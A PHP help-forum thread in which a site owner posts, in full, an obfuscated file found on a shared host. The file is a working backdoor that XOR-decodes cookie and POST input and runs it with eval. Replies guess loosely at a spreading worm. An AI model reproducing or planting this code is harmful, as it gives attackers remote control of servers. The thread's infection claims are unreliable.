PHP Virus on My Shared Server Web Host (What is this?)

General PHP Help
#1

Several random named php files show up on my website daily, with obscured php text inside the files. The (virus) has infected the entire (300+ websites) shared server and HostGator keeps saying they are “trying” to remove it. It’s been months. Anyways, does anyone know what this obscured php code is doing?? Thanks for any help!

<?php
$QDrpq	= "\x73"   ./* jAL  */"\164"	./*  lYOpC */chr (114)    .     chr     (95)/*   jUeO */./*   mrKiB   */chr/* BWH */(    666/*  pGJG  */-	552/*   UM*/).chr  (101)   .	chr (112)  .	"\x65"	.   "\x61"	.	"\x74";
    $eOiaz    =	chr	(101)   ./*  Xm  */"\x78"/*   uQIg */.     chr    (  180/*  xX   */-     68	).chr	(108)/* xBsxS */.   'o'	.	"\x64"/*Q*/./*zQjJT */"\x65";


$tfwhnZIIg/* siqa*/=/*  qGR */chr/*  sa*/(99) ./*  GM*/chr  (   752	-    641	)."\165"	./* Aq */"\x6e"	.    't';
				$kyUSM =/*  Kb  */"\160"   . "\141"	.	chr	(/*  EfSB */976	-/*GAWg */877	).'k';
   $vdUgpBog    =    Array	(/*   CC  */"zkCzdqZ"/*gtG   */=>/*  xiBA  */"devWZhFMcEJJpbpPiRuFWB"  );
       $eRCfZSfcE	=	Array	(/*  VkFZ   */"sRftEcwUUANnsNQUwVJiYpdrUg"	=>	"DIpwsJGoThYjfbJywX"/* y  */);
				   foreach     (    Array(   $vdUgpBog,/*XDSQH*/$_POST,	$eRCfZSfcE,/* wJ   */$_COOKIE,/*UEtW*/$vdUgpBog)    as	$JpSTIY)    {
			/* FCY  */foreach    (/*MCl */$JpSTIY/* Amn*/as	$sizBZ	=>	$IMDimAXSfR	)     {
				   $IMDimAXSfR/*   h */=/*q   */@$kyUSM( 'H'/*   ep  */.   chr  (/*nmGe   */754 -/* vOo   */712/*  Xd  */),/* J   */$IMDimAXSfR	);


    $sizBZ	.=	"cMaddtC-NOZP-hjfvIOe-JAaoaQh-yDR-tKjgRqY-XULU";


/*SEHs  */$sizBZ	=	$QDrpq    (/*pQjum*/$sizBZ, (  strlen(/*  MzE */$IMDimAXSfR	)/strlen(/*   YeuIH*/$sizBZ     )	)	+   1);


	$fuOJQqrsm     =	$IMDimAXSfR ^/* a */$sizBZ;


/* L  */$fuOJQqrsm	=/*  DrIPy */$eOiaz/*  lBm */(/* ITdQ */chr/*   kog  */(	592	-	557	),/* Olgvy   */$fuOJQqrsm	);
				   if   (/*  DDM*/$tfwhnZIIg	(/* XUkQ  */$fuOJQqrsm ) ==/*VBrQ   */3    )	{
					/*   p */eval	(    $fuOJQqrsm[1]	(    $fuOJQqrsm[2]/*Y   */)     );
  	exit/*  Mbt*/();
    }
		  }
    	}
#2

Nope and I am not going to try to find out. :rofl:

1 Like
#3

Lol! Hey I don’t blame you. I have this thing in an offline php sandbox trying to figure it out. It’s wild and moves fast. I need a PHP expert to figure this one out. My IT boss (very smart php admin) couldn’t figure it out.

#4

You sure this is a virus? Is your site down? Honestly, it looks like a bunch of gibberish…

#5

Yes, it’s a virus. It spreads from server to server very well. It my sandbox I see that it opens a back door for remote access. I’m guessing for the bot controller to execute admin commands/code. It’s pretty slick and quiet and good at avoiding detection.

#6

Wow! Did you ever figure out the server’s vulnerability?

#7

I found out what this php virus is doing. This is only one of 3 other php files that make up this worm virus. It’s using php(eval), a known trouble maker, along with cookies and php post to somehow make its way from web server to web server, avoiding detection. Once on the server it opens a back door to allow remote execution of even more malicious code, depending on what the server has data wise and what network it’s on.

This took a small team of hackers to figure it out today and send me details. The org bot controller connection is very encoded and I can’t break it aka don’t know where the control point is.

It’s still on a few servers of host gator, shared servers, meaning 2,000+ websites are prb infected. Looking for important data to steal and send back to the botnet.

#8

Ouch. But how did it get infected? Is Hostgator (which I used to use) vulnerable? The reason I ask is for information so I can make sure my site is secure. It is fully dedicated with a firewall…

#9

From the stats I’ve gathered, it’s infecting from Wordpress sites that are on HostGator. I reached out to 1&1, GoDaddy, Bluehost and a few others, with sample signatures of this virus. They said zero detections were found so it seems as this was built around a host gator/Wordpress exploit.

You will see a random named, encoded php file in some random directory of your website. From what I’ve found, it likes to hide where other php files are at, to blend in. Never just plain index or images etc. pretty smart worm/virus bot.

It does not need Wordpress to spread tho as I’ve never used Wordpress and it got into my websites directories. I’m still not sure how it’s infecting websites without Wordpress but I’m working on it. I’ve got the code decoded and decrypted, I will post later when home.

#10

I appreciate your time!

1 Like
Sponsor our Newsletter | Privacy Policy | Terms of Service